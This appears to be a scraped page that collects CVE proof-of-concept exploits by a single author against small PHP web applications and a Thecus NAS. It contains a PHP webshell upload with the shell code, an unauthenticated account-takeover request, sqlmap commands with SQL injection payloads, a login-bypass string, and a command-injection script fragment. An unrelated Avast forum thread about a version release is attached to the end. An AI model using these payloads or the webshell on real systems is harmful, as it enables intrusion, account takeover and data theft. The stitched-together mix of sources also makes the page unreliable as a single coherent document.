Multi Store Inventory Management System v1.0 was discovered to contain an information disclosure vulnerability which allows attackers to access sensitive files.

    # Exploit Title: Multi Store Inventory Management System - Information Disclosure# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.bdtask.com/# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/# Version: 1.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3noz# Description :The application allows directory listing and information disclosure ofsome sensitive files that can allow an attacker to leverage the disclosedinformation.################################################PoC Html :<html><head><body><title>Multi Store Inventory Management System - Information Disclosure</title><iframesrc=http://127.0.0.1/multistore_demo/install/sql/install.sql></body></head><html>

CVE-2022-28991: Multi Store Inventory Management System 1.0 Information Disclosure ≈ Packet Storm

Multi Store Inventory Management System v1.0 allows attackers to perform an account takeover via a crafted POST request.

    # Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.bdtask.com/# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/# Version: 1.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3noz# Description :An attacker can takeover any registered 'Staff' user account by just sending below POST requestBy changing the the "id", "email", "password" , "firstname" and "lastname" parameters#Steps to Reproduce :1. Send the below POST request by changing "id", "email", "password" parameters.2. Log in to the user account by changed email and password.################################################POST /multistore_demo/dashboard/home/setting HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687Content-Length: 1645Origin: http://localhostConnection: closeReferer: http://localhost/multistore_demo/dashboard/home/settingCookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405Upgrade-Insecure-Requests: 1-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="id"1-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="firstname"saud-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="lastname"test-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="email"s3od@hi.com-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="password"admin123-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="about"-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="old_image"-----------------------------246162487211952414471071914687Content-Disposition: form-data; name="image"; filename=""Content-Type: application/octet-stream-----------------------------246162487211952414471071914687--

CVE-2022-28993: Multi Store Inventory Management System 1.0 Account Takeover ≈ Packet Storm

Pharmacy Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file.

    # Exploit Title: Pharmacy management system - Remote Code Execution (RCE)# Date: 19/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz# Exploit  :  You can upload a php shell file as a productImage# ------------------------------------------------------------------------------------------#                                           POC# ------------------------------------------------------------------------------------------# Request sent as base userPOST /dawapharma/dawapharma/php_action/editProductImage.php?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631Content-Length: 559Connection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneelUpgrade-Insecure-Requests: 1-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="old_image"-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="productImage"; filename="shell.php"Content-Type: image/jpeg<?phpif($_REQUEST['s']) {  system($_REQUEST['s']);  } else phpinfo();?></pre></body></html>-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="btn"-----------------------------208935235035266125502673738631--# ResponseHTTP/1.1 302 FoundDate: Tue, 19 Apr 2022 20:43:17 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cachelocation: ../product.phpContent-Length: 77Connection: closeContent-Type: text/html; charset=UTF-8Image uploaded successfully{"success":true,"messages":"Successfully Updated"}# ------------------------------------------------------------------------------------------#                                   Request to webshell# ------------------------------------------------------------------------------------------GET /dawapharma/dawapharma/assets/myimages/shell.php?s=echo+0xSaudi HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=d2hvmuiicg9o9jl78hc2mkneel# ------------------------------------------------------------------------------------------#                                    Webshell response# ------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Tue, 19 Apr 2022 20:55:58 GMTServer: Apache/2.4.52 (Unix) OpenSSL/1.1.1m PHP/8.1.2 mod_perl/2.0.11 Perl/v5.32.1X-Powered-By: PHP/8.1.2Content-Length: 33Connection: closeContent-Type: text/html; charset=UTF-8…0xSaudi</pre></body></html>

CVE-2022-30887: Pharmacy Management System 1.0 Shell Upload ≈ Packet Storm

Multi-Vendor Online Groceries Management System v1.0 was discovered to contain a blind SQL injection vulnerability via the id parameter in /products/view_product.php.

    # Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
    # Date: 11/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Windows 10
    
    
    # Vulnerable Code
    
    line 2 in file "mvogms/products/view_product.php
    
    $qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");
    
    # Sqlmap command:
    
    sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch
    
    # Output:
    
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: page=products/view_product&id=3' AND 9973=9973-- ogag
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ

CVE-2022-26632: Offensive Security’s Exploit Database Archive

Simple Student Quarterly Result/Grade System v1.0 was discovered to contain a SQL injection vulnerability via /sqgs/Actions.php.

    # Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
    # Date: 11/02/2022
    # Exploit Author: Saud Alenazi
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
    # Version: 1.0
    # Tested on: XAMPP, Linux 
    
    
    
    
    # Vulnerable Code
    
    line 57 in file "/sqgs/Actions.php"
    
    @$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];
    
    
    Steps To Reproduce:
    * - Go to the login page http://localhost/sqgs/login.php
    
    Payload:
    
    username: admin ' or '1'='1'#--
    password: \
    
    
    
    Proof of Concept :
    
    POST /sqgs/Actions.php?a=login HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 51
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/sqgs/login.php
    Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v
    
    username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi

CVE-2022-26633: Offensive Security’s Exploit Database Archive

School Dormitory Management System v1.0 was discovered to contain a SQL injection vulnerability via the month parameter at /dms/admin/reports/daily_collection_report.php.

    # Exploit Title: School Dormitory Management System - 'month' SQL Injection# Date: 08/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 59 in file "/dms/admin/reports/daily_collection_report.php"$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");# Sqlmap command:sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: month (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report    Type: UNION query    Title: Generic UNION query (NULL) - 11 columns    Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report

CVE-2022-30886: School Dormitory Management System 1.0 SQL Injection ≈ Packet Storm

ChatBot Application with a Suggestion Feature 1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /simple_chat_bot/admin/responses/view_response.php.

CVE-2022-30518

Online Sports Complex Booking System v1.0 was discovered to contain a blind SQL injection vulnerability via the id parameter in /scbs/view_facility.php.

CVE-2022-28105

Thecus 4800Eco was discovered to contain a command injection vulnerability via the username parameter in /adm/setmain.php.

\# To fix SSL error that occurs when script is started.

\# 1- Open /etc/ssl/openssl.cnf file

\# At the bottom of the file:

\# 2- Set value of MinProtocol as TLSv1.0

def readResult(s, target):

"params": '\[{"start":0,"limit":1,"catagory":"sys","level":"all"}\]'

url \= "https://" + target + "/adm/setmain.php"

resultReq \= s.post(url, data\=d, verify\=False)

dict \= resultReq.text.split()

print("\[+\] Reading system log...\\n")

#Set your command output range

def delUser(s, target, command):

"username": "$("+command+")"

url \= "https://" + target + "/adm/setmain.php?fun=setlocaluser"

delUserReq \= s.post(url, data\=d, allow\_redirects\=False, verify\=False)

if 'Local User remove succeeds' in delUserReq.text:

print('\[+\] %s command was executed successfully' % command)

print('\[-\] %s command was not executed!' %command)

def addUser(s, target, command):

d \= {'batch\_content': '%24('+command+')%2C22222%2C9999'}

url \= "https://" + target + "/adm/setmain.php?fun=setbatch"

addUserReq \= s.post(url, data\=d, allow\_redirects\=False, verify\=False)

if 'Users and groups were created successfully.' in addUserReq.text:

print('\[+\] Users and groups were created successfully')

print('\[-\] Users and groups were not created')

delUser(s, target, command)

def login(target, username, password, command\=None):

urllib3.disable\_warnings(urllib3.exceptions.InsecureRequestWarning)

"option": "com\_extplorer"

url \= "https://" + target + "/adm/login.php"

loginReq \= s.post(url, data\=d, allow\_redirects\=False, verify\=False)

if '"success":true' in loginReq.text:

print('\[+\] Authentication successful')

elif '"success":false' in loginReq.text:

print('\[-\] Authentication failed!')

print('\[-\] Something went wrong!')

addUser(s, target, command)

print("usage: %s targetIp:port username password command" % (args\[0\]))

print("Example 192.168.1.13:80 admin admin id")

login(target\=args\[1\], username\=args\[2\], password\=args\[3\], command\=args\[4\])

if \_\_name\_\_ \== "\_\_main\_\_":

CVE-2021-34111: Thecus N4800Eco Nas Server Control Panel Comand Injection

An arbitrary file write vulnerability in Avast Premium Security before v21.11.2500 (build 21.11.6809.528) allows attackers to cause a Denial of Service (DoS) via a crafted DLL file.

** Topic: NEW Avast Version 22.1 (January 2022)  (Read 9757 times)**

0 Members and 1 Guest are viewing this topic.

Hi, all. Please welcome the newest version of **Avast AV: 22.1** (22.1.2504)

_Notable improvements in the release:_

*   **Wi-Fi Inspector Password Hints** - Wi-Fi Inspector can now recommend more secure passwords for your home network
*   **Firewall improvements in the UI** - We've re-ordered the Firewall Tabs inside the interface
*   **Boot Time Scan Results** - You'll notice how from now on you get actual results from scans even after reboots

_Some bugfixes we worked on:_

*   Rootkit driver BSOD was fixed
*   User Interface password now works fine, doesn't get removed after update
*   And many more...

The first release of the year! Thank you to our team for the great effort!  
**How to install:**  
1\. Update from your existing Avast version via Settings -> Update -> Update program  
2\. Or you can download and install files:  
_Online installers (recommended):_

*   Free: https://bits.avcdn.net/insttype\_FREE
*   Premium Security: https://bits.avcdn.net/insttype\_APR

_Offline installers:_

*   Free: https://files.avast.com/iavs9x/avast\_free\_antivirus\_setup\_offline.exe
*   Premium Security: https://files.avast.com/iavs9x/avast\_premier\_antivirus\_setup\_offline.exe

(In case the hyperlink here wouldn't work in your browser, just paste and copy the URL to the browser address bar)

« _Last Edit: February 09, 2022, 06:48:17 AM by Karel Šťavík_ »

 Logged

Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.

 Logged

Thanks, spreading the news... 

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Thanks for the new release 

 Logged

**Main:** Win10 Pro 21H2 64bit / Core i5-7400 3.0GHz / 16GB RAM / Avast 22 Premium _**Beta(Icarus)**_ / Comodo Firewall (testing again)  
**Mobile:** Win10 Pro 21H1 64bit / Core i5-3340M 2.7GHz / 8GB RAM / Avast 21 Free / Windows Firewall Control

**Avast の設定について解説しています。**よろしければご覧ください。

Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?

 Logged

> Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  

Update

 Logged

> > Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  
> 
> Update  

Looks like the "version" should be Avast AV: 22.1 (22.1.6921).

\-dwh

 Logged

> Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.  

Avast shows enlightened self-interest and respect by taking note of the obervations of users.  Not to do so shows contempt for users.  To ignore users' views is tantamount to cutting off their own noses to spite their faces.  I wander off the Avast path from time to time.  The experience of that makes me respect Avast all the more.  The little popups are a price well worth paying.

 Logged

Windows 10 Pro x64, Avast Free 22.3.6008, Malwarebytes Anti-Exploit, Malwarebytes Anti-Ransomware

The free version doesn't have a firewall does it?

 Logged

 Logged

> The free version doesn't have a firewall does it?  

On Avast Free Antivirus (not Avast One Essentials), No it isn't, the two products are different.   
Don't I recall you trying Avast One and going back  ?

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

There's **Avast Free** and then there is  
**Avast One Essential**  
Both a free but different products.

 Logged

> The free version doesn't have a firewall does it?  

Hi, it does (since a few months).

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

> > The free version doesn't have a firewall does it?  
> 
> Hi, it does (since a few months).  

It isn't installed by default, but can be downloaded from the UI (I'm still on version 21.11.xxxx). 

Though I guess from a clean install it would be unless you didn't opt for a custom install.

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

It's an option that needs to be selected in a custom install  
as explained here: https://youtu.be/IxozZFC9XRk  
You can also select it later by using the option in  
troubleshooting to modify what you've installed.

 Logged

Tag

#php